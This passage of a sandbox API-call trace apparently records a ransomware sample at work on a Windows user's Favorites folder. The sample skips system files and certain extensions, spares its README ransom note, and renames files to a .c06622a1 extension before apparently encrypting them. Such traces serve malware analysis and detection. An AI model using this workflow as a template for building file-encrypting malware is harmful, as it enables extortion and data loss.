HALPmcxz\\Favorites\\Windows Live\\") returned="" [0150.265] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 0x39 [0150.265] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", fInfoLevelId=0x0, lpFindFileData=0x3fea6c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3fea6c) returned 0x2db8780 [0150.265] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd82e42e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd82e42e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0150.265] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0150.265] _wcsicmp (_Str1="Get Windows Live.url", _Str2="README.c06622a1.TXT") returned -11 [0150.265] wcsstr (_Str="Get Windows Live.url", _SubStr="README") returned 0x0 [0150.265] _wcsicmp (_Str1="autorun.inf", _Str2="Get Windows Live.url") returned -6 [0150.265] wcslen (_String="autorun.inf") returned 0xb [0150.265] _wcsicmp (_Str1="boot.ini", _Str2="Get Windows Live.url") returned -5 [0150.265] wcslen (_String="boot.ini") returned 0x8 [0150.265] _wcsicmp (_Str1="bootfont.bin", _Str2="Get Windows Live.url") returned -5 [0150.265] wcslen (_String="bootfont.bin") returned 0xc [0150.265] _wcsicmp (_Str1="bootsect.bak", _Str2="Get Windows Live.url") returned -5 [0150.265] wcslen (_String="bootsect.bak") returned 0xc [0150.265] _wcsicmp (_Str1="desktop.ini", _Str2="Get Windows Live.url") returned -3 [0150.265] wcslen (_String="desktop.ini") returned 0xb [0150.265] _wcsicmp (_Str1="iconcache.db", _Str2="Get Windows Live.url") returned 2 [0150.265] wcslen (_String="iconcache.db") returned 0xc [0150.265] _wcsicmp (_Str1="ntldr", _Str2="Get Windows Live.url") returned 7 [0150.265] wcslen (_String="ntldr") returned 0x5 [0150.265] _wcsicmp (_Str1="ntuser.dat", _Str2="Get Windows Live.url") returned 7 [0150.265] wcslen (_String="ntuser.dat") returned 0xa [0150.265] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Get Windows Live.url") returned 7 [0150.265] wcslen (_String="ntuser.dat.log") returned 0xe [0150.265] _wcsicmp (_Str1="ntuser.ini", _Str2="Get Windows Live.url") returned 7 [0150.265] wcslen (_String="ntuser.ini") returned 0xa [0150.265] _wcsicmp (_Str1="thumbs.db", _Str2="Get Windows Live.url") returned 13 [0150.265] wcslen (_String="thumbs.db") returned 0x9 [0150.265] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0150.266] wcslen (_String="386") returned 0x3 [0150.266] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0150.266] wcslen (_String="adv") returned 0x3 [0150.266] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0150.266] wcslen (_String="ani") returned 0x3 [0150.266] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0150.266] wcslen (_String="bat") returned 0x3 [0150.266] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0150.266] wcslen (_String="bin") returned 0x3 [0150.266] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0150.266] wcslen (_String="cab") returned 0x3 [0150.266] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0150.266] wcslen (_String="cmd") returned 0x3 [0150.266] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0150.266] wcslen (_String="com") returned 0x3 [0150.266] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0150.266] wcslen (_String="cpl") returned 0x3 [0150.266] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0150.266] wcslen (_String="cur") returned 0x3 [0150.266] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0150.266] wcslen (_String="deskthemepack") returned 0xd [0150.266] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0150.266] wcslen (_String="diagcab") returned 0x7 [0150.266] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0150.266] wcslen (_String="diagcfg") returned 0x7 [0150.266] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0150.266] wcslen (_String="diagpkg") returned 0x7 [0150.266] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0150.266] wcslen (_String="dll") returned 0x3 [0150.266] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0150.266] wcslen (_String="drv") returned 0x3 [0150.266] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0150.266] wcslen (_String="exe") returned 0x3 [0150.266] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0150.266] wcslen (_String="hlp") returned 0x3 [0150.266] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0150.266] wcslen (_String="icl") returned 0x3 [0150.266] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0150.266] wcslen (_String="icns") returned 0x4 [0150.267] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0150.267] wcslen (_String="ico") returned 0x3 [0150.267] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0150.267] wcslen (_String="ics") returned 0x3 [0150.267] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0150.267] wcslen (_String="idx") returned 0x3 [0150.267] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0150.267] wcslen (_String="ldf") returned 0x3 [0150.267] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0150.267] wcslen (_String="lnk") returned 0x3 [0150.267] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0150.267] wcslen (_String="mod") returned 0x3 [0150.267] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0150.267] wcslen (_String="mpa") returned 0x3 [0150.267] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0150.267] wcslen (_String="msc") returned 0x3 [0150.267] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0150.267] wcslen (_String="msp") returned 0x3 [0150.267] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0150.267] wcslen (_String="msstyles") returned 0x8 [0150.267] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0150.267] wcslen (_String="msu") returned 0x3 [0150.267] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0150.267] wcslen (_String="nls") returned 0x3 [0150.267] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0150.267] wcslen (_String="nomedia") returned 0x7 [0150.267] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0150.267] wcslen (_String="ocx") returned 0x3 [0150.267] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0150.267] wcslen (_String="prf") returned 0x3 [0150.267] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0150.267] wcslen (_String="ps1") returned 0x3 [0150.267] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0150.267] wcslen (_String="rom") returned 0x3 [0150.267] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0150.267] wcslen (_String="rtp") returned 0x3 [0150.267] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0150.267] wcslen (_String="scr") returned 0x3 [0150.267] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0150.268] wcslen (_String="shs") returned 0x3 [0150.268] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0150.268] wcslen (_String="spl") returned 0x3 [0150.268] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0150.268] wcslen (_String="sys") returned 0x3 [0150.268] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0150.268] wcslen (_String="theme") returned 0x5 [0150.268] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0150.268] wcslen (_String="themepack") returned 0x9 [0150.268] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0150.268] wcslen (_String="wpx") returned 0x3 [0150.268] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0150.268] wcslen (_String="lock") returned 0x4 [0150.268] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0150.268] wcslen (_String="key") returned 0x3 [0150.268] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0150.268] wcslen (_String="hta") returned 0x3 [0150.268] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0150.268] wcslen (_String="msi") returned 0x3 [0150.268] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0150.268] wcslen (_String="pdb") returned 0x3 [0150.268] _wcsicmp (_Str1="sql", _Str2="url") returned -2 [0150.268] wcslen (_String="sql") returned 0x3 [0150.268] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0150.268] wcslen (_String="sqlite") returned 0x6 [0150.268] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live")) returned 0x10 [0150.268] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0150.268] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0150.268] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned 0x38 [0150.268] wcscpy (in: _Dest=0x4500102, _Source="Get Windows Live.url" | out: _Dest="Get Windows Live.url") returned="Get Windows Live.url" [0150.268] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url", dwFileAttributes=0x80) returned 1 [0150.269] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x670 [0150.269] SetFilePointerEx (in: hFile=0x670, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0150.269] CloseHandle (hObject=0x670) returned 1 [0150.269] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0150.269] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" [0150.269] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url") returned 0x4d [0150.269] wcscpy (in: _Dest=0x4510132, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.269] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.c06622a1"), dwFlags=0x8) returned 1 [0150.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Get Windows Live.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\get windows live.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x670 [0150.271] CreateIoCompletionPort (FileHandle=0x670, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0150.271] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4af0020 [0150.277] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6c87f0cc [0150.277] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3cd4b07c [0150.277] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x14e5398f [0150.277] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x57b5c973 [0150.277] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x292cb5f0 [0150.277] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4941bf7b [0150.277] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4b57c65e [0150.277] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x37ebf5b0 [0150.280] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4af0094, Length=0x80) returned 0x9e3a77bd [0150.280] RtlComputeCrc32 (PartialCrc=0x77bd, Buffer=0x4af0094, Length=0x80) returned 0xbb40bd32 [0150.280] RtlComputeCrc32 (PartialCrc=0xbd32, Buffer=0x4af0094, Length=0x80) returned 0xdb7de9c [0150.280] RtlComputeCrc32 (PartialCrc=0xde9c, Buffer=0x4af0094, Length=0x80) returned 0xd046212b [0150.280] RtlComputeCrc32 (PartialCrc=0x212b, Buffer=0x4af0094, Length=0x80) returned 0x38aaa682 [0150.281] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4af0020) returned 1 [0150.281] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4500090) returned 1 [0150.281] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4510098) returned 1 [0150.281] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd82e42e0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xd82e42e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xd82e42e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0150.281] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0150.281] FindNextFileW (in: hFindFile=0x2db8780, lpFindFileData=0x3fea6c | out: lpFindFileData=0x3fea6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0150.281] _wcsicmp (_Str1="Windows Live Gallery.url", _Str2="README.c06622a1.TXT") returned 5 [0150.281] wcsstr (_Str="Windows Live Gallery.url", _SubStr="README") returned 0x0 [0150.281] _wcsicmp (_Str1="autorun.inf", _Str2="Windows Live Gallery.url") returned -22 [0150.281] wcslen (_String="autorun.inf") returned 0xb [0150.281] _wcsicmp (_Str1="boot.ini", _Str2="Windows Live Gallery.url") returned -21 [0150.281] wcslen (_String="boot.ini") returned 0x8 [0150.281] _wcsicmp (_Str1="bootfont.bin", _Str2="Windows Live Gallery.url") returned -21 [0150.281] wcslen (_String="bootfont.bin") returned 0xc [0150.281] _wcsicmp (_Str1="bootsect.bak", _Str2="Windows Live Gallery.url") returned -21 [0150.281] wcslen (_String="bootsect.bak") returned 0xc [0150.281] _wcsicmp (_Str1="desktop.ini", _Str2="Windows Live Gallery.url") returned -19 [0150.281] wcslen (_String="desktop.ini") returned 0xb [0150.281] _wcsicmp (_Str1="iconcache.db", _Str2="Windows Live Gallery.url") returned -14 [0150.281] wcslen (_String="iconcache.db") returned 0xc [0150.281] _wcsicmp (_Str1="ntldr", _Str2="Windows Live Gallery.url") returned -9 [0150.281] wcslen (_String="ntldr") returned 0x5 [0150.281] _wcsicmp (_Str1="ntuser.dat", _Str2="Windows Live Gallery.url") returned -9 [0150.281] wcslen (_String="ntuser.dat") returned 0xa [0150.281] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Windows Live Gallery.url") returned -9 [0150.281] wcslen (_String="ntuser.dat.log") returned 0xe [0150.281] _wcsicmp (_Str1="ntuser.ini", _Str2="Windows Live Gallery.url") returned -9 [0150.281] wcslen (_String="ntuser.ini") returned 0xa [0150.281] _wcsicmp (_Str1="thumbs.db", _Str2="Windows Live Gallery.url") returned -3 [0150.281] wcslen (_String="thumbs.db") returned 0x9 [0150.281] _wcsicmp (_Str1="386", _Str2="url") returned -66 [0150.281] wcslen (_String="386") returned 0x3 [0150.281] _wcsicmp (_Str1="adv", _Str2="url") returned -20 [0150.282] wcslen (_String="adv") returned 0x3 [0150.282] _wcsicmp (_Str1="ani", _Str2="url") returned -20 [0150.282] wcslen (_String="ani") returned 0x3 [0150.282] _wcsicmp (_Str1="bat", _Str2="url") returned -19 [0150.282] wcslen (_String="bat") returned 0x3 [0150.282] _wcsicmp (_Str1="bin", _Str2="url") returned -19 [0150.282] wcslen (_String="bin") returned 0x3 [0150.282] _wcsicmp (_Str1="cab", _Str2="url") returned -18 [0150.282] wcslen (_String="cab") returned 0x3 [0150.282] _wcsicmp (_Str1="cmd", _Str2="url") returned -18 [0150.282] wcslen (_String="cmd") returned 0x3 [0150.282] _wcsicmp (_Str1="com", _Str2="url") returned -18 [0150.282] wcslen (_String="com") returned 0x3 [0150.282] _wcsicmp (_Str1="cpl", _Str2="url") returned -18 [0150.282] wcslen (_String="cpl") returned 0x3 [0150.282] _wcsicmp (_Str1="cur", _Str2="url") returned -18 [0150.282] wcslen (_String="cur") returned 0x3 [0150.282] _wcsicmp (_Str1="deskthemepack", _Str2="url") returned -17 [0150.282] wcslen (_String="deskthemepack") returned 0xd [0150.282] _wcsicmp (_Str1="diagcab", _Str2="url") returned -17 [0150.282] wcslen (_String="diagcab") returned 0x7 [0150.282] _wcsicmp (_Str1="diagcfg", _Str2="url") returned -17 [0150.282] wcslen (_String="diagcfg") returned 0x7 [0150.282] _wcsicmp (_Str1="diagpkg", _Str2="url") returned -17 [0150.282] wcslen (_String="diagpkg") returned 0x7 [0150.282] _wcsicmp (_Str1="dll", _Str2="url") returned -17 [0150.282] wcslen (_String="dll") returned 0x3 [0150.282] _wcsicmp (_Str1="drv", _Str2="url") returned -17 [0150.282] wcslen (_String="drv") returned 0x3 [0150.282] _wcsicmp (_Str1="exe", _Str2="url") returned -16 [0150.282] wcslen (_String="exe") returned 0x3 [0150.282] _wcsicmp (_Str1="hlp", _Str2="url") returned -13 [0150.282] wcslen (_String="hlp") returned 0x3 [0150.282] _wcsicmp (_Str1="icl", _Str2="url") returned -12 [0150.282] wcslen (_String="icl") returned 0x3 [0150.282] _wcsicmp (_Str1="icns", _Str2="url") returned -12 [0150.282] wcslen (_String="icns") returned 0x4 [0150.282] _wcsicmp (_Str1="ico", _Str2="url") returned -12 [0150.283] wcslen (_String="ico") returned 0x3 [0150.283] _wcsicmp (_Str1="ics", _Str2="url") returned -12 [0150.283] wcslen (_String="ics") returned 0x3 [0150.283] _wcsicmp (_Str1="idx", _Str2="url") returned -12 [0150.283] wcslen (_String="idx") returned 0x3 [0150.283] _wcsicmp (_Str1="ldf", _Str2="url") returned -9 [0150.283] wcslen (_String="ldf") returned 0x3 [0150.283] _wcsicmp (_Str1="lnk", _Str2="url") returned -9 [0150.283] wcslen (_String="lnk") returned 0x3 [0150.283] _wcsicmp (_Str1="mod", _Str2="url") returned -8 [0150.283] wcslen (_String="mod") returned 0x3 [0150.283] _wcsicmp (_Str1="mpa", _Str2="url") returned -8 [0150.283] wcslen (_String="mpa") returned 0x3 [0150.283] _wcsicmp (_Str1="msc", _Str2="url") returned -8 [0150.283] wcslen (_String="msc") returned 0x3 [0150.283] _wcsicmp (_Str1="msp", _Str2="url") returned -8 [0150.283] wcslen (_String="msp") returned 0x3 [0150.283] _wcsicmp (_Str1="msstyles", _Str2="url") returned -8 [0150.283] wcslen (_String="msstyles") returned 0x8 [0150.283] _wcsicmp (_Str1="msu", _Str2="url") returned -8 [0150.283] wcslen (_String="msu") returned 0x3 [0150.283] _wcsicmp (_Str1="nls", _Str2="url") returned -7 [0150.283] wcslen (_String="nls") returned 0x3 [0150.283] _wcsicmp (_Str1="nomedia", _Str2="url") returned -7 [0150.283] wcslen (_String="nomedia") returned 0x7 [0150.283] _wcsicmp (_Str1="ocx", _Str2="url") returned -6 [0150.283] wcslen (_String="ocx") returned 0x3 [0150.283] _wcsicmp (_Str1="prf", _Str2="url") returned -5 [0150.283] wcslen (_String="prf") returned 0x3 [0150.283] _wcsicmp (_Str1="ps1", _Str2="url") returned -5 [0150.283] wcslen (_String="ps1") returned 0x3 [0150.283] _wcsicmp (_Str1="rom", _Str2="url") returned -3 [0150.283] wcslen (_String="rom") returned 0x3 [0150.283] _wcsicmp (_Str1="rtp", _Str2="url") returned -3 [0150.283] wcslen (_String="rtp") returned 0x3 [0150.283] _wcsicmp (_Str1="scr", _Str2="url") returned -2 [0150.283] wcslen (_String="scr") returned 0x3 [0150.283] _wcsicmp (_Str1="shs", _Str2="url") returned -2 [0150.283] wcslen (_String="shs") returned 0x3 [0150.284] _wcsicmp (_Str1="spl", _Str2="url") returned -2 [0150.284] wcslen (_String="spl") returned 0x3 [0150.284] _wcsicmp (_Str1="sys", _Str2="url") returned -2 [0150.284] wcslen (_String="sys") returned 0x3 [0150.284] _wcsicmp (_Str1="theme", _Str2="url") returned -1 [0150.284] wcslen (_String="theme") returned 0x5 [0150.284] _wcsicmp (_Str1="themepack", _Str2="url") returned -1 [0150.284] wcslen (_String="themepack") returned 0x9 [0150.284] _wcsicmp (_Str1="wpx", _Str2="url") returned 2 [0150.284] wcslen (_String="wpx") returned 0x3 [0150.284] _wcsicmp (_Str1="lock", _Str2="url") returned -9 [0150.284] wcslen (_String="lock") returned 0x4 [0150.284] _wcsicmp (_Str1="key", _Str2="url") returned -10 [0150.284] wcslen (_String="key") returned 0x3 [0150.284] _wcsicmp (_Str1="hta", _Str2="url") returned -13 [0150.284] wcslen (_String="hta") returned 0x3 [0150.284] _wcsicmp (_Str1="msi", _Str2="url") returned -8 [0150.284] wcslen (_String="msi") returned 0x3 [0150.284] _wcsicmp (_Str1="pdb", _Str2="url") returned -5 [0150.284] wcslen (_String="pdb") returned 0x3 [0150.284] _wcsicmp (_Str1="sql", _Str2="url") returned -2 [0150.284] wcslen (_String="sql") returned 0x3 [0150.284] _wcsicmp (_Str1="sqlite", _Str2="url") returned -2 [0150.284] wcslen (_String="sqlite") returned 0x6 [0150.284] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live")) returned 0x10 [0150.284] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4500090 [0150.284] wcscpy (in: _Dest=0x4500090, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live" [0150.284] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live") returned 0x38 [0150.284] wcscpy (in: _Dest=0x4500102, _Source="Windows Live Gallery.url" | out: _Dest="Windows Live Gallery.url") returned="Windows Live Gallery.url" [0150.284] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url", dwFileAttributes=0x80) returned 1 [0150.285] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x618 [0150.285] SetFilePointerEx (in: hFile=0x618, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0150.285] CloseHandle (hObject=0x618) returned 1 [0150.285] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x4510098 [0150.285] wcscpy (in: _Dest=0x4510098, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" [0150.285] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url") returned 0x51 [0150.285] wcscpy (in: _Dest=0x451013a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0150.285] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.c06622a1"), dwFlags=0x8) returned 1 [0150.287] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Gallery.url.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live gallery.url.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x618 [0150.287] CreateIoCompletionPort (FileHandle=0x618, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0150.287] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4b80020 [0150.292] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x8ad7d1a [0150.292] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1edfc5ed [0150.292] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4cec76a8 [0150.292] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1a7fd188 [0150.292] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x57887f7a [0150.292] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6687c477 [0150.292] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x59608913 [0150.292] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x12eaec85 [0150.295] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4b80094, Length=0x80) returned 0x784ea038 [0150.295] 